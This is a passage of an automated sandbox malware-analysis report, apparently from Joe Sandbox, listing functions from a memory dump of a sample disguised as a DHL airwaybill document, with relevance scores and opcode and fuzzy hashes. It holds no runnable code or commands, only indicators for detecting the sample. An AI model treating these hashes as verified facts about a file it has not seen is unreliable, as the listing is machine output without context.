                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ceb73ffa07d46ebe9872f151c2bbf9fa13cc9fd7bb9cbe2f9b9276c7d8f6777
                • Instruction ID: 0149fef1b4a3ef1a20e1ad1b43760e215212cd12121fcb5f20c9317a5798a8e3
                • Opcode Fuzzy Hash: 1ceb73ffa07d46ebe9872f151c2bbf9fa13cc9fd7bb9cbe2f9b9276c7d8f6777
                • Instruction Fuzzy Hash: 21318F716042019FD728DF28C8C0EBAB7E5FB84B10F1545ADF9969BA96D770EC04CB91
                Function 01B7EB1D Relevance: .1, Instructions: 100COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e57630113606fac6134b9ec863e0ecdc079cd2632ff38096eae77518bfeed167
                • Instruction ID: 17d63ec8f54391519bb0820f4bed09fb9b5eb6207c67702a626de61d8c86b71a
                • Opcode Fuzzy Hash: e57630113606fac6134b9ec863e0ecdc079cd2632ff38096eae77518bfeed167
                • Instruction Fuzzy Hash: 2531A031201682ABF72E576C8988B657FD9FF41B84F5900E0AA55DB7E1EB28D841C230
                Function 01BC61C3 Relevance: .1, Instructions: 97COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 730b61591fa6b04c358ed034c9730970675fe6f72d0b83d1c06625b009dd496a
                • Instruction ID: cf41c61274b3e31d3844e20bcc2a11931e02a65be9bccf6c50bb78923147db70
                • Opcode Fuzzy Hash: 730b61591fa6b04c358ed034c9730970675fe6f72d0b83d1c06625b009dd496a
                • Instruction Fuzzy Hash: E2319476A00156ABDB19DF98C840FAEB7B6EB48B40F5541A9E500AF344D770ED41CBA4
                Function 01BA483A Relevance: .1, Instructions: 96COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3c954627da4fbfac173bd34f5ce66d250531482cbe37344628f3534b45cc02a7
                • Instruction ID: d5ea01af185b9cd538e749989159aeb742b2be905fc8ff56a128c7aec1f4dd3e
                • Opcode Fuzzy Hash: 3c954627da4fbfac173bd34f5ce66d250531482cbe37344628f3534b45cc02a7
                • Instruction Fuzzy Hash: CC315076A4012DAFCF25DF54DD84BDEBBBAEB98310F5400E5A508A7250DB70DE918F90
                Function 01B2EB20 Relevance: .1, Instructions: 96COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 458eda039ca83272c406c067024ce41e7b4b804dd26a7e0770de64f7bd336c0b
                • Instruction ID: e7c76c12183ae9264a95a2859879ed37fdd85392cfdab21a8e54e659b5babaa0
                • Opcode Fuzzy Hash: 458eda039ca83272c406c067024ce41e7b4b804dd26a7e0770de64f7bd336c0b
                • Instruction Fuzzy Hash: 3A31EB72D00225AFDB25DFA9CC84AAEBBF8EF14750F0145A5E915D7250D770DE008BA0
                Function 01BC60B8 Relevance: .1, Instructions: 95COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d696f325d5ef46747210db71f7d7f1e614f6fc1b2fa2e9e1e388df3c673502cc
                • Instruction ID: 50a100c06ae33599990c8cc18b34ab607dcfb31340c0d83d5053ebf9bad7ad2f
                • Opcode Fuzzy Hash: d696f325d5ef46747210db71f7d7f1e614f6fc1b2fa2e9e1e388df3c673502cc
                • Instruction Fuzzy Hash: 6031C471B00606AFDB1A9B5AC890F6AB7F9EF84B55F1140EDE505DB352DB30DC018790
                Function 01B007AF Relevance: .1, Instructions: 95COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cb0b14079a96e9cc51786976b1d9cbc0e7bf50dc5fdca9ad95ac12e5cfe923d1
                • Instruction ID: 4e0c9b0c9a40d662312868d7d0cc30f21ac7063327a1e158f3f1ce304ccd4367
                • Opcode Fuzzy Hash: cb0b14079a96e9cc51786976b1d9cbc0e7bf50dc5fdca9ad95ac12e5cfe923d1
                • Instruction Fuzzy Hash: FC31C732A04712DBCB1BEE588840B6BBFA5FF94290F0145ADFD5597290EB30DD1187D1
                Function 01B08550 Relevance: .1, Instructions: 94COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02dfc67ca80890c0a9fd6150e3369ae3284ebbf8fe1b3ced5f213ac8cce8cc6c
                • Instruction ID: 01e9615f3dd8b42c39eff96ceb047fa3df121104535473168e11fbf7113354fd
                • Opcode Fuzzy Hash: 02dfc67ca80890c0a9fd6150e3369ae3284ebbf8fe1b3ced5f213ac8cce8cc6c
                • Instruction Fuzzy Hash: F331AD71A093018FE729CF19C840B2ABBE9FB98700F0549EEF98897391D775E944CB91
                Function 01B3A6C7 Relevance: .1, Instructions: 92COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                • Instruction ID: 60047f07caf014d819820ec193663e06304a2a0df9921b7cbbc61cd40deb07f0
                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                • Instruction Fuzzy Hash: 63311C72B00B01EFE769CF79D981B56BBF8EB48750F14456DA59AC3651E730E9008B60
                Function 01BAEBD0 Relevance: .1, Instructions: 91COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8c22484ca6a0d2329b34830e49207a488c2df65f3ba9541ce9368cda2b6d8724
                • Instruction ID: 501ae83716300e955ff385d8940deb0b0ca48dd51479659143a7f909c5e2cbce
                • Opcode Fuzzy Hash: 8c22484ca6a0d2329b34830e49207a488c2df65f3ba9541ce9368cda2b6d8724
                • Instruction Fuzzy Hash: 4331AC71509302DFCB19DF19C54095ABBF1FF89318F8549EEE9889B261E330E944CB92
                Function 01B2438F Relevance: .1, Instructions: 89COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 738ed6e4381ea516baf655c162dfd24350aedd6ade207266faa6133d9ec61c7e
                • Instruction ID: 7a565a94dea334b4af07d58d79f6e3a30a6fbd4925bed97ebf804d7792f6200d
                • Opcode Fuzzy Hash: 738ed6e4381ea516baf655c162dfd24350aedd6ade207266faa6133d9ec61c7e
                • Instruction Fuzzy Hash: 3831F832B006159FDB28DFA8C980E6EB7F9EF94304F0085A9D519D7A54DB30DD49CB50
                Function 01AFCB7E Relevance: .1, Instructions: 89COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                • Instruction ID: cde811944eb203e34a9e73a8a8cc4577abb595cc7b4adb44e41b35c84b832b4d
                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                • Instruction Fuzzy Hash: 13210436E4025AAADB159BFA8851BBFBBB5EF14750F058179AE15F7340E370C90187A0
                Function 01AFC156 Relevance: .1, Instructions: 88COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5135efc2488ed26ae912190fe9bedc8cdb07c65df407458d60f731961ad6fe06
                • Instruction ID: e7174a6c7735efbaf896dff53b0e413191afb04589534dcc9246ec661ac0dbc2
                • Opcode Fuzzy Hash: 5135efc2488ed26ae912190fe9bedc8cdb07c65df407458d60f731961ad6fe06
                • Instruction Fuzzy Hash: C1314D715002019BDF79AF68CC41BA977B4EF50314F9482EDED459B386EB34D982CBA0
                Function 01BBC3CD Relevance: .1, Instructions: 88COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                • Instruction ID: 35e4b0448a5d55bb0c39dc19c94122cfad6f6d535a9e534c3a0a60aa6c4fe34f
                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                • Instruction Fuzzy Hash: 3D212D3A60065277CF1DEB958880AFEBFB4EF40710F40845AFA5587951E778DA50C360
                Function 01AFE420 Relevance: .1, Instructions: 88COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 107045ae1729bd4497d2b09d64634a52038918be2d9add9f175ff77199cfb0bb
                • Instruction ID: 1f8db615d19345b104884f06f6b3aa3f631330546c9a937de3c90abf040db42d
                • Opcode Fuzzy Hash: 107045ae1729bd4497d2b09d64634a52038918be2d9add9f175ff77199cfb0bb
                • Instruction Fuzzy Hash: 9C31C431A0051C9BDB359F68CC41FEEB7B9AB15750F0600E9F745A72A1E7759E808F90
                Function 01B34588 Relevance: .1, Instructions: 87COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                • Instruction ID: 790d944f30aeba4c80e23b61ba78ff324dfae7c98ef320f1f1ec79abef00305a
                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                • Instruction Fuzzy Hash: E3217435A00605EBCF19CF58D980A8EBBB5FF88714F1080E5FE159B241D771DE159B90
                Function 01B344B0 Relevance: .1, Instructions: 87COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f1edcf418a99e927cceb6a55377510ab4c48ccc0b827d56d64a1e8ea67d1c39
                • Instruction ID: 14576951d983ca31b3928d01efeec07cc1a7393e21e5ebae37eff01c4d530c34
                • Opcode Fuzzy Hash: 3f1edcf418a99e927cceb6a55377510ab4c48ccc0b827d56d64a1e8ea67d1c39
                • Instruction Fuzzy Hash: B921C572A047459BCB26DF18C840B6B7BE4FBCC760F024599FD559B681D730E9118B91
                Function 01AFE388 Relevance: .1, Instructions: 86COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                • Instruction ID: 1d769ba181be8c26ce292084142f9ada902096a0e961ad6b65c1a846c616a253
                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                • Instruction Fuzzy Hash: 18319A31600605EFEB25CFA8C884F6AB7F9EF45354F1545A9EA12CB2A1E770EE01CB50
                Function 01B7E609 Relevance: .1, Instructions: 86COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: affeded813b8e716a0c2f13ed0bd3716a5d77537aad6aaa0e3e16f971145c9e4
                • Instruction ID: 2d10b5f507dbacdbc0a614ea1928bea670173a542f80f5c1f64fa26933782832
                • Opcode Fuzzy Hash: affeded813b8e716a0c2f13ed0bd3716a5d77537aad6aaa0e3e16f971145c9e4
                • Instruction Fuzzy Hash: 29317C75A00205DFCB18DF1CC8849AEB7B6FF88304B1585D9F8199B391E771EA50CB90
                Function 01B806F1 Relevance: .1, Instructions: 79COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0929026e7d2fe1389b326e325c272f795cfd6e80619aa22e7c26e33c92058797
                • Instruction ID: fbbd6881e26aaacae59c574c4f5912e2d4f117fb1dd2f6837a2fe0bbdc6d5922
                • Opcode Fuzzy Hash: 0929026e7d2fe1389b326e325c272f795cfd6e80619aa22e7c26e33c92058797
                • Instruction Fuzzy Hash: 22218075A00629ABCF24EF59C881ABEB7F8FF48740F5540A9F541A7250D738AD41CBA1
                Function 01B8019F Relevance: .1, Instructions: 78COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d074d21f0480f0bc4b1a2ef80fd372d8c1862aa877b46afb6459bc5c0bb9398a
                • Instruction ID: 5d7dab8b421350713b55e002f838cafcb91132a1533096144438b15511d8de2c
                • Opcode Fuzzy Hash: d074d21f0480f0bc4b1a2ef80fd372d8c1862aa877b46afb6459bc5c0bb9398a
                • Instruction Fuzzy Hash: DB218B71600645AFDB19EFA9D880F6AB7A8FF48790F1441A9F904D76A0E734ED40CBA4
                Function 01B80283 Relevance: .1, Instructions: 74COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6136639f0cdaf161b60ef357f9e9f48781eebf9404fd3d0a78b814f8e7dce524
                • Instruction ID: b8b7db74f090e03996d77affb317209af0889f6d4d820b57adc0d19d7b8181f3
                • Opcode Fuzzy Hash: 6136639f0cdaf161b60ef357f9e9f48781eebf9404fd3d0a78b814f8e7dce524
                • Instruction Fuzzy Hash: 4621D3729043469BD715FF59C884B5BBBDCEF94A90F080496BD80C7261D730C908C6A1
                Function 01B22835 Relevance: .1, Instructions: 73COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6d59db732081aadd8b2fb3104c9848d3dc3c34db41013ba081afeb4728af0f9
                • Instruction ID: 853b3e061715d0db8aa527c8cdbd93bb7b0304e62a2c139f9e2d4dacab2607cd
                • Opcode Fuzzy Hash: a6d59db732081aadd8b2fb3104c9848d3dc3c34db41013ba081afeb4728af0f9
                • Instruction Fuzzy Hash: FD21F8326056919BEB2A662C8C44B247BD9EF51B74F1903E4FA24AF6E2D7ACC801C110
                Function 01B3A30B Relevance: .1, Instructions: 70COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b901882d0319a51cd02f2a7f11c1f493732e29368b979816b21b2b07f8f8d75
                • Instruction ID: 9eaba033b09b995ef7c90d6fe488b9d7fb7278fea90d0b381d51aaac9ac94186
                • Opcode Fuzzy Hash: 7b901882d0319a51cd02f2a7f11c1f493732e29368b979816b21b2b07f8f8d75
                • Instruction Fuzzy Hash: 3E21A739200A019FCB29DF29C840B56B7F5FF48B04F2484ACA559CBBA1E771E842CB94
                Function 01BBA49A Relevance: .1, Instructions: 70COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c87cb417f1bc876daa49a968906a0df06dc86d9e5b4549481870341e1a91a6dd
                • Instruction ID: 9fbfbc04ef11a9deeba53a9e8f7eabb2cb53e8a9e6ba2719a98bf5046157cce9
                • Opcode Fuzzy Hash: c87cb417f1bc876daa49a968906a0df06dc86d9e5b4549481870341e1a91a6dd
                • Instruction Fuzzy Hash: 34117A32740A117FDB2666349C80FBB7AC9DBD4B20F5000A8B709CB190EBF0DD018391
                Function 01B80946 Relevance: .1, Instructions: 70COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 36dfc56699957c40e6bbb6a350d1ea476670f7eb72777e4428eb6444913f2d42
                • Instruction ID: 5ab9cef253c3d4d0a8827b98064a6634b846699833022978b920f7b9b2aea77c
                • Opcode Fuzzy Hash: 36dfc56699957c40e6bbb6a350d1ea476670f7eb72777e4428eb6444913f2d42
                • Instruction Fuzzy Hash: 6521F8B1E00209ABCB24DFAAD9809AEFBF8FF98B00F10016FE505E7250D7709945CB54
                Function 01B980A8 Relevance: .1, Instructions: 69COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                • Instruction ID: 43026f9af2fbc4ec734c229d519604a2c840751644338ec15c05a50b54db1a35
                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                • Instruction Fuzzy Hash: D9218EB2A00209EFDF169F99CC40BAEBBB9EF89350F2144A9F904A7251D734D9518B50
                Function 01B30124 Relevance: .1, Instructions: 68COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                • Instruction ID: b67d999faf91272af17dafa7c9672f7b672d8f10a9328c93a788c9ad08312cf1
                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                • Instruction Fuzzy Hash: 9F11D073600A05AFDB26EA46D840F9ABBB8EF84754F1040A9F6018B190D771ED54DB50
                Function 01B08770 Relevance: .1, Instructions: 68COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1ff0e10363dd5fe7c6dc13073da02bc1879c821f4d567799a4876d0ec6bbbb5
                • Instruction ID: 4420e2333dfa77d04cff7ef9a99d6f8d45a3b602c7b499c780759212f71234e7
                • Opcode Fuzzy Hash: e1ff0e10363dd5fe7c6dc13073da02bc1879c821f4d567799a4876d0ec6bbbb5
                • Instruction Fuzzy Hash: C111B231B006119BDB1ACF4DC4C0A56BFE9EF9A710B1840FDEE099F249D7B2DA018B91
                Function 01B3AAEE Relevance: .1, Instructions: 68COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                • Instruction ID: f701bbab98a02ca41bc0d59db20e10453b66a6acc95401f1e9c84932fa29ab57
                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                • Instruction Fuzzy Hash: BB21AC32600601DFDB3D8F59C540A26BBE6EBD4B10F2189BDE589C7620E730EC01CB80
                Function 01B080E9 Relevance: .1, Instructions: 66COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0b56fe582da42e88964691e0bc95b2476f8189f2d92b2d6b0936550bb2cfa9de
                • Instruction ID: d56c70d0e865f60fc06d337d92afd55175a3ad153d520285ce7d9a1a1e434dc1
                • Opcode Fuzzy Hash: 0b56fe582da42e88964691e0bc95b2476f8189f2d92b2d6b0936550bb2cfa9de
                • Instruction Fuzzy Hash: B4217C35A00206DFCB19CF59C580AAABBB5FF88314F2041ADD105A7350CB71AE06CBD0
                Function 01B3674D Relevance: .1, Instructions: 65COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b66a5fc9e3ba5bf3c5315208c155fc5509fc8dd1d50b532edc80a927fbd53765
                • Instruction ID: 51ca514a137cbc7e786c683679a43959f1ba65704e0af8f54143bddfbc16b2ed
                • Opcode Fuzzy Hash: b66a5fc9e3ba5bf3c5315208c155fc5509fc8dd1d50b532edc80a927fbd53765
                • Instruction Fuzzy Hash: 48215E75500A01EFD7299F69C881B66B7F8FF84350F44886DE99AC7650EB70A950CB60
                Function 01B2E8C0 Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2fddcbe1b5b8fcf7bfd7e3998cb70dd0f33d8a295481552efa8d30b765fd8d20
                • Instruction ID: 47612fab7bc6a77ebb164123f840048b0284e78824e66ede3264b915bd1d920b
                • Opcode Fuzzy Hash: 2fddcbe1b5b8fcf7bfd7e3998cb70dd0f33d8a295481552efa8d30b765fd8d20
                • Instruction Fuzzy Hash: DB11E5333011249BCF1DDA2ADC91A6B725AEFD5370B2545ADDA268B294EB30EC16C390
                Function 01B96870 Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28785a04a7f2bed318ecee0211be4b1408352f4246bbaf3f89fa17255d74bdad
